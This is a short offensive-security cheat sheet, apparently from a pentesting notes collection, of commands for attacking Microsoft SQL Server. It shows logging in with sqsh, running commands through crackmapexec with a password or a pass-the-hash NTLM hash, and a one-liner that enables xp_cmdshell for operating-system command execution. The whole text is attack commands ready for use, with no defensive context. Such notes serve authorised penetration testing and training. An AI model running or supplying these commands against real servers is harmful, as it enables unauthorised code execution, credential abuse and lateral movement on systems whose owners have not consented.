```bash sqsh -S $IP -U <user> -P password # Username + Password + CMD command crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami" crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable' # Check if xp_cmdshell is enabled SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'; # This turns on advanced options and is needed to configure xp_cmdshell sp_configure 'show advanced options', '1' RECONFIGURE #This enables xp_cmdshell sp_configure 'xp_cmdshell', '1' RECONFIGURE #One liner EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; ```